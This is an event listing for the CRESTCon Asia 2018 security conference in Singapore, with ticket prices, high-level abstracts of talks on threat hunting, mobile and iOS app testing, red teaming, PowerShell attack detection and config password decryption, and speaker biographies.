CRESTCon Asia 2018
CRESTCon Asia 2018 is a unique event that brings together leading technical and business information security professionals in the industry.
DATE & TIME
Friday, 20 July 2018 / 9:00 AM to 6:00 PM
Suntec Singapore Convention & Exhibition Centre1 Raffles BoulevardRoom 303-304Singapore 039593
AiSP and partner association members - S$32.10(Cloud Security Alliance, Division Zero, Edgis, ISACA, (ISC)2, itSMF, Law Society, Null Singapore, OWASP, SCS, SGTech and others)
General Public - S$53.50
Student - S$10.70
CREST Member Companies - S$32.10 (2 complimentary tickets, please contact Vincent at c2VjcmV0YXJpYXQgfCBhaXNwICEgc2c=)
Fees are inclusive of GST. Tea break and lunch will be provided.
Advancing And Assessing Threat Hunting ProgramsTeo Kia Meng
Threat Hunting serves an essential detection function within the security programs of many organisations. This talk will showcase attacks of advancing sophistication and complexity, while simultaneously outlining principles and capabilities that Threat Hunting programs will need to possess to keep up with these attacks. The talk will conclude by showing how your organisation can visualise and assess the effectivness of current threat hunting efforts, which is crucial in prioritizing limited time and resources.
Fixing Mobile AppSecSven Schleier
Even though modern mobile operating systems like iOS and Android offer great APIs for secure data storage and communication, those APIs have to be used correctly in order to be effective. Data storage, inter-app communication, proper usage of cryptographic APIs and secure network communication are only some of the aspects that require careful consideration. The OWASP Mobile Security Testing Guide (MSTG) is a comprehensive manual for testing the security of mobile apps. It describes processes and techniques for verifying the requirements listed in the Mobile Application Security Verification Standard (MASVS) and provides a baseline for complete and consistent security tests.
In this talk, the final version of the MASVS and MSTG will be introduced and will discuss the many challenges we faced during development, from dealing with the diversity and fragmentation of the Android ecosystem to clarifying the role of software protections in mobile security.
This talk consists of 3 blocks:
Introduction of version 1.0 of the MASVS
Introduction of version 1.0 of the MSTG
Live Demo of testing data storage on iOS
1. OWASP Mobile Application Security Verification Standard (MASVS)
This first block of the talk will introduce the MASVS, which is the foundation of the Mobile Security Testing Guide project. It is a community effort to establish a framework of security requirements needed to design, develop and test secure mobile apps on iOS and Android and is meant to achieve the following:
Offer an industry standard that can be tested against in mobile app security reviews;
Provide requirements for software architects and developers seeking to develop securemobile applications;
Provide specific recommendations as to what level of security is recommended fordifferent use-cases.
The talk will also specifically outline the importance of security requirements during the development of mobile apps. The experience with several projects where the MASVS has been used during the SDLC will also be shared.
2. OWASP Mobile Security Testing Guide (MSTG)
The second part of the talk will introduce the MSTG. The MSTG is a comprehensive manual for testing the security of mobile apps. It describes technical processes for verifying the controls listed in the OWASP Mobile Application Security Verification Standard (MASVS). The MSTG is meant to provide a baseline set of test cases for static and dynamic security tests, and to help ensure completeness and consistency of the tests.
The goal of this project is to help people understand the what, why, when, where, and how of testing applications on Android and iOS devices. The project delivers a complete suite of test cases designed to address the Mobile Application Security Verification Standard (MASVS) and also coverage of the OWASP Mobile Top 10.
An additional attack vector in the mobile world compared to web apps is Reverse Engineering of mobile apps and bypassing its defences against it. Anti-Reverse Engineering defences like obfuscation will be clarified during the talk and an assessment methodology offered by the MSTG will be explained.3. Live Demo of testing local storage on iOS
The last part of the talk will be a demo of local storage test cases that are described in the MSTG for the iOS platform. Two different scenarios will be covered:
Penetration Tester: The first demo will showcase how a penetration tester can get full access to the local storage of an app on a non-jailbroken phone. This is achieved by repackaging the IPA with Frida and using a tool called objection. This allows a penetration tester to analyse the local storage on a non-jailbroken iOS device in order to identify sensitive information such as PII.
Developer: The second demo will showcase how a developer can verify easily what kind of information is stored by the App in local storage. This will be demonstrated by using Xcode and an iOS emulator, which is the development environment iOS developers are already familiar with.
This will also showcase that the MSTG is not only for penetration testers but also allows developers to verify for vulnerabilities with the tools they are using.
Supercharge Your Web Recon With Commonspeak and Evolutionary WordlistsMichael Gianarakis & Shubham Shah
When conducting a web application penetration test understanding and extending the attack surface is an exercise that is critical for success. Having a large wordlist of realistic directories, files and domains is assists immensely with this process. Commonspeak is a wordlist generation tool that leverages public datasets from Google's BigQuery platform. By performing queries on large datasets that are updated frequently, commonspeak is able to generate wordlists that are "evolutionary", in the sense that they reflect the newest trends on the internet.
This presentation will discuss the concept of evolutionary wordlists and how Commonspeak parses URLs from various BigQuery datasets including HTTPArchive, Stack Overflow and HackerNews to build current, consistently evolving and realistic wordlists of directories, files, parameter names for specific technologies, and subdomains. We will also introduce Commonspeak 2 and discuss the additions to the tool including scheduled wordlist creation, comprehensive GitHub queries, a permutation engine for subdomain discovery and asynchronous wordlist generation.
Approaching Red Teaming with a ‘Militant Mindset’Matt Lorentzen
The concept of Red Teaming is to emulate committed attackers with a goal in mind. This goal maybe to gain access to sensitive data, influence financial processes, gain access to intellectual property or damage company assets and reputation.
This then poses the question of how to successfully emulate these attackers and how to adopt an organised, attacking mindset.This talk will present some concepts that underpin successful Red Teaming engagements focusing on the following key areas :
Designing flexible attacking infrastructure
Attack strategy and orchestration
Powershell: From Attackers' to Defenders' PerspectiveElliott Neo & Crystal Tan
McAfee Labs saw PowerShell malware grow by 267% in the fourth quarter of 2017, and by 432% year over year. The malicious behaviour associated with PowerShell attacks can range from lateral movement, to credentials theft, privilege escalation, data exfiltration, establishing persistence, system disruption and command and control activity. The rise of fileless malware using powershell makes detection even more difficult. Moreover, powershell can be easily obfuscated and cannot be reliably detected with static signatures and file hashes. To make matters worse, many targeted attack groups already use PowerShell in their attack chain as downloader and for lateral movement.
In this talk, we will discuss about the recent trends and attacks of PowerShell and the various tools and techniques that can be used to detect malicious PowerShell scripts. In addition, we will highlight the PowerShell built-in logs and the potential mitigations to counter these attacks.
iOS Runtime Hacking Crash CourseMichael Gianarakis & Shubham Shah
Over the past few years there have been a number of significant changes and trends in the iOS ecosystem that have complicated reverse engineering and exploiting iOS applications for penetration testing purposes. The introduction of Swift, the move to 64bit only and the rise of cross platform frameworks such as Xamarin, Cordova and React Native have affected the techniques and tools traditionally used for these tasks. This talk will provide a crash course in exploiting iOS applications through the manipulation of the application runtime. The aim is to provide practical examples of how to observe and manipulate the inner workings of applications on iOS to defeat security protections including jailbreak prevention, anti-debugging and certificate pinning, obtain credentials and other sensitive information and subvert business logic.
Config Password Encryption Gone WrongKeith Lee
Sometimes, penetration tests gets tougher after an organization has undergo several tests by different testers over a couple of years. The difficulty of getting Domain Admin access is even tougher especially when organization gets better at securing their systems and source codes.
For example, for the first year of penetration test, a penetration tester might get lucky and find clear text credentials in configuration files on a system that he/her can use to move laterally and vertically in the network.
Things might get tougher after that as organizations could started adding encryption to the passwords in configuration files, making some penetration testers turn away and look for other low hanging fruits in order to move laterally and vertically into the network.
However, sometimes, the encryption can be poorly implemented and can be defeated easily and can result in an instant win for the penetration tester.
In this presentation, we discuss a real life case example where I found able to get into a system but the passwords were encrypted in the configuration files for Tomcat servlets. However, it wasn’t implemented properly and I was able to decrypt the passwords and ultimately compromise the entire network. We will also discuss some tricks and tips on how to identify if the Tomcat server is using this encryption library/tool, where to find the key and how to decrypt the passwords.
The main takeaway is that penetration testers should not give up immediately if they find encrypted passwords in configuration files.
Crystal TanThe Ultimate Software Group of Asia Pte Ltd
Crystal Tan is a Security Analyst at a US-based cloud technology company. She holds a Bachelor degree in Computer Science specializing in Digital Systems Security and has done research on the mitigations against PowerShell attacks. She has experience in cyber crime investigation such as phishing, fraud and embezzlement.
Elliott NeoThe Ultimate Software Group of Asia Pte Ltd
Elliott Neo is seasoned security practitioner who has a keen interest in cyber security and forensics and holds a degree in cyber forensics. In his current role as Senior Security Analyst at a US-based cloud technology company, he is involved in security operations which includes incident response and threat monitoring. His research interest includes cyberattacks related to PowerShell and developing detections to detect cyber threats.
Keith LeeTrustwave SpiderLabs
Keith Lee is a Senior Security Consultant with Trustwave's SpidersLabs Asia-Pacific. SpiderLabs has a focus on security research. Keith regulary presents at conferences. Keith has presented at security conferences worldwide such asDefcon, Thocon, HITB, Rootcon, Zeronights, PHDays, etc.
Matthew LorentzenTrustwave SpiderLabs
Matt has 20 years IT industry experience working within government, military, finance, education and commercial sectors. He is a senior security consultant and penetration tester at SpiderLabs with a focus on red team engagements. Before joining SpiderLabs, he worked with Hewlett Packard Enterprise as a CHECK Team Leader delivering penetration testing services to a global client list. Prior to HPE, Matt ran his own IT consultancy company for 7 years.
Michael Gianarakis is the CEO of Assetnote, a platform for continuous monitoring of your external attack surface. Michael has presented research at various industry events and meetups including, DEF CON, Black Hat Asia, BSides Las Vegas, Thotcon, Rootcon, and Hack in the Box. Michael is also actively involved in the local security community in Australia where he is one of organisers of the monthly SecTalks meetup as well as the hacker camp TuskCon.
Shubham Shah is the CTO of Assetnote, a platform for continuous monitoring of your external attack surface. Shubham is a prolific bug bounty hunter in the top 50 hackers on HackerOne and has presented at various industry events including QCon London, Kiwicon, BSides Canberra and WAHCKon. Shubham is also a founder of the charity Hackers Helping Hackers which provides hackers from under-represented and less privileged groups access to industry events, mentorship and training.
Sven SchleierVantage Point Security Pte Ltd
Sven is an experienced web and mobile penetration tester and assessed everything from historic Flash applications to progressive mobile apps. He is also a security engineer that supported many projects end-to-end during the SDLC to "build security in". He was speaking at local and international meetups and conferences and is conducting hands-on workshops about web application and mobile app security.
Teo Kia MengMWR InfoSecurity
TEO Kia Meng is a Threat Hunter (Detection and Reponse Team) at Countercept, a 24/7 managed threat hunting service by MWR InfoSecurity. He enjoys detecting and dealing with the wide range of threats seen at work. Interests include all things blue-team, and submitting CTF flags.
Also check out other Business Events in Singapore, Meetups in Singapore, Nonprofit Events in Singapore.
Liked this event? Spread the word :